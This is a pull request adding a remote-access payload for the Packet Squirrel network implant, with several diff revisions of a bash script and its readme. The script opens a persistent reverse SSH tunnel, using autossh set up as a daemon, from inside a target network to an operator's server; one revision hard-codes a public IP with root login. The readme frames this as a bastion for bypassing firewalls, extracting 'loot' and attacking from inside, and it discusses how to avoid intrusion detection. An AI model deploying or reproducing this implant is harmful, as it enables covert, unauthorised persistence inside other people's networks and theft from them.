### PR TITLE
Packet Squirrel Remote Access payload

### DIFF
--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -2,10 +2,10 @@
 # Title: SSH Remote Management Tool for Packet Squirrel
 # Description: Makes packet Squirrel directly accessible via SSH on a remote server
 # Author: BlackPropaganda
-# Version: 0.1
+# Version: 0.5
 # Category: Remote-Access
 # Net Mode: NAT
-# Firmware: 1.2
+# Firmware: 3.0
 #
 # LED State Descriptions
 # Magenta Solid - SSH connecting
@@ -26,11 +26,13 @@ LED SETUP
 #
 # If this step fails, the payload will fail.
 
-autossh_host="root@165.233.121.2"
+autossh_host="root@<remote server IP>"
 autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2)
 autossh_port="22"
 autossh_remoteport="2222"
 autossh_localport="22"
+switch=SWITCH
+interface="eth1"
 
 if ! grep $autossh_host_ip /root/.ssh/known_hosts; then
    echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log
@@ -49,9 +51,9 @@ fi
 #
 
 # waiting until eth1 acquires IP address
-while ! ifconfig "eth1" | grep "inet addr"; do sleep 1; done
+while ! ifconfig "$interface" | grep "inet addr"; do sleep 1; done
 
-echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
+echo -e "starting server.\n" >> /root/payloads/$switch/debug.txt
 
 # starting sshd and waiting for process to start
 /etc/init.d/sshd start

--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -41,3 +41,4 @@ ssh -L 22:127.0.0.1:$c2_tunnel_port -i id_rsa -p $c2_port $tunnel_user@$c2_serve
 # SSH connection failed, target network may be hardened.
 LED R
 NETMODE OFF
+LED FINISH

--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -9,7 +9,7 @@
 #
 # LED State Descriptions
 # Magenta Solid - SSH connecting
-# Amber - SSH connection successful
+# Amber - SSH connection attempted
 #
 
 NETMODE NAT

--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -9,56 +9,78 @@
 #
 # LED State Descriptions
 # Magenta Solid - SSH connecting
-# Blue - SSH connection successful
+# Amber - SSH connection successful
 #
 
-# C2 Server address, port and tunnel port
-c2_server="192.168.1.145"
-c2_tunnel_port=2222
-tunnel_user="username"
-# no pass needed, headless mode required so RSA key file is used.
-# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
-
-# waiting for button press to start SSH connection.
-#BUTTON
-#
-
-# Magenta indicates SSH connection is launching and the server should have received the connection.
+NETMODE NAT
 LED SETUP
 
-echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt
-
-# we need an IP, so it'll have to be NAT, unless implanted inline.
-NETMODE NAT
-sleep 8
-
-# debug
-#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt
-
-# fix file permission problems
-# chmod 600 id_rsa
-
-# -R indicates remote port forwarding which tunnels connections to localhost on server to client.
-# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
-# the tunnel port specified on the server to reach the Squirrel.
+# no pass needed, headless mode required so RSA key file is used.
 #
-# default port is 22
-echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt
+# generate the key by running the following command in the /root/.ssh/ folder:
+# 'ssh -t rsa -b 2048 -f id_rsa'
+#
+# To ensure that this works as intended, the user will have to connect to this host at least once
+# with ssh -i /root/.ssh/id_rsa username@remote_server_ip to add this server to the squirrels list
+# of trusted hosts.
+#
+# If this step fails, the payload will fail.
+
+autossh_host="root@165.233.121.2"
+autossh_host_ip=$(echo $autossh_host | cut -d '@' -f2)
+autossh_port="22"
+autossh_remoteport="2222"
+autossh_localport="22"
+
+if ! grep $autossh_host_ip /root/.ssh/known_hosts; then
+   echo "$autossh_host not in known_hosts, exiting..." >> /root/autossh.log
+   LED FAIL
+   exit 1
+fi
+
+#
+# For the life of me I couldn't get SSH to work. The funny thing was it would
+# run in the shell command, but not in the payload. The following solution
+# implements a tool called autossh which ensures nothing funky happens to the
+# connection.
+#
+# the following was ripped from dark_pyrro (the legend) via:
+# https://codeberg.org/dark_pyrro/Packet-Squirrel-autossh/src/branch/main/payload.sh
+#
+
+# waiting until eth1 acquires IP address
+while ! ifconfig "eth1" | grep "inet addr"; do sleep 1; done
 
 echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
-service sshd start
-sleep 3
 
-ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server
-# echo $ssh_out >> /root/payloads/switch3/debug.txt
-# ssh_pid=$!
+# starting sshd and waiting for process to start
+/etc/init.d/sshd start
+until netstat -tulpn | grep -qi "sshd"
+do
+    sleep 1
+done
 
-echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt
+# stopping autossh
+/etc/init.d/autossh stop
+
+#
+# Much like the SSH server, AutoSSH has a configuration file. This
+# needs to be configured to support this connection as a daemon.
+#
+# Create a "fresh template" for the autossh configuration
+# Starting with an empty autossh file in /etc/config
+# isn't something that uci is very fond of
+echo "config autossh" > /etc/config/autossh
+echo "        option ssh" >> /etc/config/autossh
+echo "        option enabled" >> /etc/config/autossh
+
+
+# UCI configuration and commission
+uci set autossh.@autossh[0].ssh="-i /root/.ssh/id_rsa -R "$autossh_remoteport":127.0.0.1:"$autossh_localport" "$autossh_host" -p "$autossh_port" -N -T"
+uci set autossh.@autossh[0].enabled="1"
+uci commit autossh
 
 LED ATTACK
-# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file
-# SSH will prompt for verification, and to add host to trusted hosts file.
 
-#BUTTON 365d && {
-#   kill $ssh_pid
-#}
+# starting autossh
+/etc/init.d/autossh start

--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -5,7 +5,7 @@
 # Version: 0.5
 # Category: Remote-Access
 # Net Mode: NAT
-# Firmware: 3.0
+# Firmware: 3.2
 #
 # LED State Descriptions
 # Magenta Solid - SSH connecting

--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -7,38 +7,58 @@
 # Net Mode: NAT
 # Firmware: 1.2
 #
-#
 # LED State Descriptions
 # Magenta Solid - SSH connecting
-# Amber Blink 5 Times - Waiting for user button press
+# Blue - SSH connection successful
 #
 
 # C2 Server address, port and tunnel port
-c2_server="192.168.1.123"
-c2_port=22
+c2_server="192.168.1.145"
 c2_tunnel_port=2222
 tunnel_user="username"
 # no pass needed, headless mode required so RSA key file is used.
 # generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
 
+# waiting for button press to start SSH connection.
+#BUTTON
+#
+
+# Magenta indicates SSH connection is launching and the server should have received the connection.
+LED SETUP
+
+echo -e "SETUP Phase\n" >> /root/payloads/switch3/debug.txt
+
 # we need an IP, so it'll have to be NAT, unless implanted inline.
 NETMODE NAT
+sleep 8
 
-# amber blinking for button press to launch SSH connection.
-LED A BLINK
-# waiting for button press to start SSH connection.
-BUTTON
-# Green indicates SSH connection has been launched and the server should have received the connection.
-LED M SOLID
+# debug
+#echo -e "NAT configured.\n" $(ifconfig) >> /root/payloads/switch3/debug.txt
 
-# -L indicates local port forwarding which tunnels connections to localhost on server to client.
+# fix file permission problems
+# chmod 600 id_rsa
+
+# -R indicates remote port forwarding which tunnels connections to localhost on server to client.
 # Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
 # the tunnel port specified on the server to reach the Squirrel.
+#
+# default port is 22
+echo -e "Connecting to Server.\n" >> /root/payloads/switch3/debug.txt
 
-# todo: push SSH connection to background to support button kill switch, create optional SSH connection keep-alive.
-ssh -L 22:127.0.0.1:$c2_tunnel_port -i id_rsa -p $c2_port $tunnel_user@$c2_server &
+echo -e "starting server.\n" >> /root/payloads/switch3/debug.txt
+service sshd start
+sleep 3
 
-# SSH connection failed, target network may be hardened.
-LED R
-NETMODE OFF
-LED FINISH
+ssh -R $c2_tunnel_port:127.0.0.1:22 -i /root/payloads/switch3/id_rsa $tunnel_user@$c2_server
+# echo $ssh_out >> /root/payloads/switch3/debug.txt
+# ssh_pid=$!
+
+echo -e "Server Connected.\n" >> /root/payloads/switch3/debug.txt
+
+LED ATTACK
+# WARNING: Initial SSH connection must be manual, since c2_server may not be included in trusted_hosts file
+# SSH will prompt for verification, and to add host to trusted hosts file.
+
+#BUTTON 365d && {
+#   kill $ssh_pid
+#}

--- a/payloads/library/remote-access/SSH-remote-access/payload.sh
+++ b/payloads/library/remote-access/SSH-remote-access/payload.sh
@@ -1,0 +1,43 @@
+#!/bin/bash
+# Title: SSH Remote Management Tool for Packet Squirrel
+# Description: Makes packet Squirrel directly accessible via SSH on a remote server
+# Author: BlackPropaganda
+# Version: 0.1
+# Category: Remote-Access
+# Net Mode: NAT
+# Firmware: 1.2
+#
+#
+# LED State Descriptions
+# Magenta Solid - SSH connecting
+# Amber Blink 5 Times - Waiting for user button press
+#
+
+# C2 Server address, port and tunnel port
+c2_server="192.168.1.123"
+c2_port=22
+c2_tunnel_port=2222
+tunnel_user="username"
+# no pass needed, headless mode required so RSA key file is used.
+# generate in this directory with: 'ssh -t rsa -b 2048 -f id_rsa'
+
+# we need an IP, so it'll have to be NAT, unless implanted inline.
+NETMODE NAT
+
+# amber blinking for button press to launch SSH connection.
+LED A BLINK
+# waiting for button press to start SSH connection.
+BUTTON
+# Green indicates SSH connection has been launched and the server should have received the connection.
+LED M SOLID
+
+# -L indicates local port forwarding which tunnels connections to localhost on server to client.
+# Once complete, connect to remote SSH server and connect to the squirrel by connecting to localhost at
+# the tunnel port specified on the server to reach the Squirrel.
+
+# todo: push SSH connection to background to support button kill switch, create optional SSH connection keep-alive.
+ssh -L 22:127.0.0.1:$c2_tunnel_port -i id_rsa -p $c2_port $tunnel_user@$c2_server &
+
+# SSH connection failed, target network may be hardened.
+LED R
+NETMODE OFF

--- a/payloads/library/remote-access/SSH-remote-access/readme.md
+++ b/payloads/library/remote-access/SSH-remote-access/readme.md
@@ -2,7 +2,32 @@
 ____
 
 ### Concept:
-The Packet Squirrel is a powerful tool, but lets say you wanted persistent access to a network
-for a long period of time. This allows the user to remote into the squirrel to do things like
-upload loot manually, and launch attacks on a network from the inside.
+The Packet Squirrel is a powerful tool for network implants. One operational issue with an implant of this nature
+is that it cannot function beyond the pre-programmed payloads.
 
+Using techniques like Dynamic Port Forwarding (SOCKS/SSH), this payload allows the user to create a Bastion 
+inside a target network. This bastion allows the user to bypass less sophisticated firewall configurations, 
+like so:
+
+    Remote SSH Host         Target Behind Firewall
+          ___                       ___
+         /  /|                     /  /|
+        /__/ |   <====[ X ]====>  /__/ |
+        |--| |                    |--| |
+        | *|/                     | *|/
+
+
+    Remote SSH Host       Packet Squirrel      Target Behind Firewall
+          ___               (inside LAN)            ___
+         /  /|             _______                 /  /|
+        /__/ |   <=====>  /______/`)   <=====>    /__/ |
+        |--| |           (__[__]_)/               |--| |
+        | *|/                                     | *|/
+    
+This assumes SSH is not denied by default on the targets' outbound firewall configuration. One limitation
+is that this tool is susceptible to detection via NIDS. Multiple outbound connections and high-bandwidth 
+utilization raises suspicion of potential attack, however this is only a concern for more sophisticated 
+targets.
+
+
+Use at your own risk. Don't do bad things.

--- a/payloads/library/remote-access/SSH-remote-access/readme.md
+++ b/payloads/library/remote-access/SSH-remote-access/readme.md
@@ -29,5 +29,85 @@ is that this tool is susceptible to detection via NIDS. Multiple outbound connec
 utilization raises suspicion of potential attack, however this is only a concern for more sophisticated 
 targets.
 
+---
 
-Use at your own risk. Don't do bad things.
+# SSH Server Configuration
+
+---
+
+This payload requires an SSH server be operational somewhere on the internet. Typically, a password
+is required to acquire shell access to these servers. This is a pain if you're trying to do everything
+automatically, so openssh allows for cryptographic pubkey authentication. More on this here: 
+https://www.redhat.com/sysadmin/key-based-authentication-ssh
+
+Firstly, for security reasons you may want to create a user account specifically for this payload.
+The reasoning is if the squirrel is lost or stolen someone has a key to your server, to mitigate this
+threat, if the squirrel is lost in a contested environment, deleting the user will block access.
+
+On most linux systems, the command is either 'useradd' or 'adduser', but this is distro specific.
+After you create the user and are prompted with the new user password, bear in mind to save it because
+you will need it during the pubkey installation process.
+
+    useradd squirrel
+
+Password-less authentication to a specific user account can be obtained by first enabling this in 
+the openssh configuration file. This file is most commonly found in /etc/ssh/sshd_config and changing the line
+'PubkeyAuthentication no' to 'PubkeyAuthentication yes'. Or, if your version does not have this,
+you can append this line near the top of the configuration file under the authentication category, like so:
+
+    # Authentication:
+
+    #LoginGraceTime 2m
+    #PermitRootLogin prohibit-password
+    #StrictModes yes
+    #MaxAuthTries 6
+    #MaxSessions 10
+    
+    PubkeyAuthentication yes
+    
+    # Expect .ssh/authorized_keys2 to be disregarded by default in future.
+    AuthorizedKeysFile      .ssh/authorized_keys .ssh/authorized_keys2
+    
+Also ensure that your AuthorizedKeysFile is present in your new users home directory.
+
+
+Secondly, on an SSH client, you will need to generate the key. For the sake of demonstration,
+we will use RSA 2048-bit keys, but you can use any of the following, such as dsa, ecdsa, ed25519 and rsa.
+
+Keep in mind that the squirrel is a tiny computer and may have trouble with higher-bit symmetrical keys
+like RSA 4096. If you are noticing performance problems, ecdsa and ed25519 are 'as secure' as RSA but require
+less intensive computations to encrypt and decrypt data. Choose your poison.
+
+here's the command to generate a key and place it in the current working directory. When you create it,
+it's best if you don't leave a password since this file will need to be readable without your input.
+so when prompted for a password just press 'enter' in the terminal. Note that this will create two files.
+First, the private key, then the pubkey.
+
+    ssh-keygen -t rsa -b 4096 -f id_rsa
+
+After we generate the SSH key, we need to install it on our remote SSH server. We can do this by entering the following
+into a terminal in the same directory. This will prompt the user for the password.
+
+    ssh-copy-id -i id_rsa squirrel@<ssh_server_ip>
+
+To test the connection, you can enter this into the terminal:
+    
+    ssh -i id_rsa squirrel@<ssh_server_ip>
+
+After confirming that the key-based authentication works, now it's time to configure the squirrel.
+In arming mode, secure copy the key to the /root/.ssh/ directory in the squirrel by running:
+
+    scp id_rsa root@172.16.32.1:/root/.ssh/id_rsa
+
+You will be prompted for a password and then the file will be uploaded.
+
+Then, you need to connect to the ssh server at least once so the squirrel adds this server to the list
+of known_hosts. More on this on the ssh man page. While in the squirrel, execute this:
+
+    ssh -i /root/.ssh/id_rsa squirrel@<ssh_server_ip>
+
+you will be prompted whether or not to add the host signature to known hosts, enter 'y'. Then,
+configure the payload to use your ssh user and IP address, then the payload should make the squirrels
+ssh server available at 127.0.0.1 on port 2222 on the ssh server.
+
+Goes without saying, but use at your own risk. Don't do bad things.

--- a/payloads/library/remote-access/SSH-remote-access/readme.md
+++ b/payloads/library/remote-access/SSH-remote-access/readme.md
@@ -35,6 +35,10 @@ targets.
 
 ---
 
+A good background for this payload is this video that Darren made doing this on the Lan Turtle:
+    https://www.youtube.com/watch?v=uIdvvrDrRj0
+
+
 This payload requires an SSH server be operational somewhere on the internet. Typically, a password
 is required to acquire shell access to these servers. This is a pain if you're trying to do everything
 automatically, so openssh allows for cryptographic pubkey authentication. More on this here: 

--- a/payloads/library/remote-access/SSH-remote-access/readme.md
+++ b/payloads/library/remote-access/SSH-remote-access/readme.md
@@ -1,0 +1,8 @@
+#Squirrel SSH Remote Access
+____
+
+### Concept:
+The Packet Squirrel is a powerful tool, but lets say you wanted persistent access to a network
+for a long period of time. This allows the user to remote into the squirrel to do things like
+upload loot manually, and launch attacks on a network from the inside.
+


### PR DESCRIPTION
Created payload under library/remote-access/SSH-remote-access

This payload uses remote port forwarding (client -> server) to make the squirrels built-in SSH server available via tunnel to a remote server.

This payload requires an SSH server be configured with the appropriate usernames and key-based authentication and port-forwarding configuration.
